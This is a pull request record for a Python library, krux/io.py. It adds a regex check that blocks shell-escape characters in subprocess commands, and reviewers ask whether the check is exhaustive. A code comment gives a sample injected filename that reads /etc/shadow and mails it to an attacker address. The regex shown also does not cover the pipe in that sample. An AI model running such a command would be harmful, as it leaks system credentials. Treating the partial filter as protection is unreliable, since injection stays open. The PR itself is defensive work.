### PR TITLE
don't allow shell=True in subprocess.Popen() calls

### PR DESCRIPTION
**Pull request by paul-krohn**
Detect shell escapes in commands called via `krux.io`.

### CODE REVIEW

File: krux/io.py [hunk 1]
```diff
@@ -103,6 +103,22 @@ def is_regex(thing):
...
+        # GOTCHA: in the case where run() is called with user input populating `command`, the oppportunity exists to
+        # pass in a filename like `sudo cat /etc/shadow | mail -s hi cracker@p0wn.io`. We should cowardly fail to run
+        # such a command, unless linting has been disabled.
+        if lint_command:
+            command_string = command
+            if isinstance(command, object):
+                command_string = str(command)
+            if isinstance(command, list):
+                command_string = ' '.join(command)
+            if re.search(r'[`$()]', command_string):
```
Comment (kruxErinWillingham) [inline krux/io.py]: is this the recommended change to us? Are there any other ways to escape this that we need to search for too?

**Comment by jib** [comment]
A PR like this _has_ to come with tests.

File: krux/io.py (hunk 1 above)
Comment (jib) [inline krux/io.py]: +1 on this comment - how can we be confident this is a complete/exhaustive list?

**Comment by hanpeter** [comment]
LGTM. I would change the tests to not actually create any files so that the tests are dependant upon file permission, but that can come later.

**Pull request merged**